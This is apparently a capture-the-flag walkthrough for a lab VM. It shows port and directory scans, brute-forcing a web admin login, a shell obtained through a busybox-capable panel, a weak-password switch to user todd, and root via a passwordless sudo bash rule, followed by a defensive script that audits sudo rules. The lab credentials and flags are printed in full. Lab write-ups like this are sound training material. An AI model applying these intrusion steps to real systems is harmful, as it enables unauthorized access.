Nostalgia series. Does this count as a kind of remake?
```bash
$ nmap -p- 192.168.31.170 --min-rate 5000 -oN nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 03:52 EST
Nmap scan report for Yibasuo (192.168.31.170)
Host is up (0.00088s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
6200/tcp filtered lm-x
MAC Address: 08:00:27:64:B0:CC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$ nmap -sVC -O -p 21,22,80 192.168.31.170 -oN nmapscan/nmap_tcp
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 03:52 EST
Nmap scan report for Yibasuo (192.168.31.170)
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.31.187
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 14 Jun 17 13:41 creds.txt
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Linux\xE9\x9D\xB6\xE6\x9C\xBA\xE5\x85\xA5\xE5\x8F\xA3
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:64:B0:CC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.01 seconds
```
```bash
$ lftp 192.168.31.170 -u anonymous
密码:
lftp anonymous@192.168.31.170:/> ls -la
drwxr-xr-x 2 0 0 4096 Jun 17 13:41 .
drwxr-xr-x 2 0 0 4096 Jun 17 13:41 ..
-rw-r--r-- 1 0 0 14 Jun 17 13:41 creds.txt
lftp anonymous@192.168.31.170:/> cat creds.txt
root:fakepass
14 bytes transferred
```

Nothing useful here.
```bash
$ feroxbuster -u 'http://192.168.31.170/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --random-agent -x php,html,txt -C 404,502 -q
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 149l 300w 4087c http://192.168.31.170/
200 GET 149l 300w 4087c http://192.168.31.170/index.php
301 GET 9l 28w 317c http://192.168.31.170/secure => http://192.168.31.170/secure/
200 GET 1022l 5284w 85928c http://192.168.31.170/info.php
302 GET 0l 0w 0c http://192.168.31.170/secure/index.php => http://192.168.31.170/
302 GET 0l 0w 0c http://192.168.31.170/secure/logout.php => http://192.168.31.170/
```

First, take a look at info.php.
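It is just phpinfo.

No disable_functions are set.

There is a username, webmaster.

A quick brute force gets the login:
admin:password123
Once logged in, it is a management system.

It can run busybox.
Got a shell back.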

```bash
www-data@Yibasuo:/var/www/html/secure$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Yibasuo:/home/todd$ cat user.txt
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}
```

Ran linpeas.sh.
Nothing much found.
todd has a weak password; just throw together any weak-password generator.
```bash
www-data@Yibasuo:/tmp$ su todd
Password: todd123!@#
todd@Yibasuo:/tmp$ cd
todd@Yibasuo:~$ ls
user.txt
todd@Yibasuo:~$ sudo -l
Matching Defaults entries for todd on Yibasuo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on Yibasuo:
(ALL) NOPASSWD: /usr/bin/bash
todd@Yibasuo:~$ sudo bash
root@Yibasuo:/home/todd# cd
root@Yibasuo:~# ls
root.txt
root@Yibasuo:~# cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40}
```
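
The `sudo -l` output above shows the rule that ends the box: `(ALL) NOPASSWD: /usr/bin/bash`. As an added example (not part of the original write-up), the script below lets an administrator audit `sudo -l` output for that class of rule; the helper name `flag_sudo_rules`, the interpreter list and the sample input are assumptions constructed for illustration.

```bash
#!/bin/sh
# Added example (not from the write-up): flag sudo rules that give a
# passwordless root shell, like "(ALL) NOPASSWD: /usr/bin/bash" above.
# Assumption: this interpreter list is illustrative, not exhaustive.
RISKY_RE='^(/usr)?/bin/(ba|da|z|k|c)?sh$|^/usr/bin/(python[0-9.]*|perl|ruby)$|^ALL$'

# flag_sudo_rules (hypothetical helper): reads `sudo -l` output on stdin and
# prints "<run-as>\tNOPASSWD\t<command>" for every risky rule it finds.
flag_sudo_rules() {
  awk -v risky="$RISKY_RE" '
    /^[ \t]*\(/ {                        # rule lines start with "(run-as)"
      line = $0
      sub(/^[ \t]*\(/, "", line)
      runas = line; sub(/\).*/, "", runas)
      rest = line;  sub(/^[^)]*\)[ \t]*/, "", rest)
      # Simplification: one NOPASSWD tag is treated as covering the whole line.
      nopasswd = (rest ~ /NOPASSWD:/)
      gsub(/[A-Z_]+:[ \t]*/, "", rest)   # drop tags such as NOPASSWD: SETENV:
      n = split(rest, cmds, /,[ \t]*/)
      for (i = 1; i <= n; i++) {
        split(cmds[i], parts, " ")       # parts[1] is the binary path
        if (nopasswd && parts[1] ~ risky)
          printf "%s\tNOPASSWD\t%s\n", runas, cmds[i]
      }
    }'
}

# Constructed sample input; the first rule mirrors the one todd had.
SAMPLE_SUDO_L='Matching Defaults entries for alice on host:
    env_reset, mail_badpass

User alice may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/bash
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/python3 -c *'

printf '%s\n' "$SAMPLE_SUDO_L" | flag_sudo_rules
```

On a live host the same function can be fed real output, for example `sudo -l -U <user> | flag_sudo_rules` run as an administrator. Any line it prints is a rule worth replacing with a narrowly scoped command or removing.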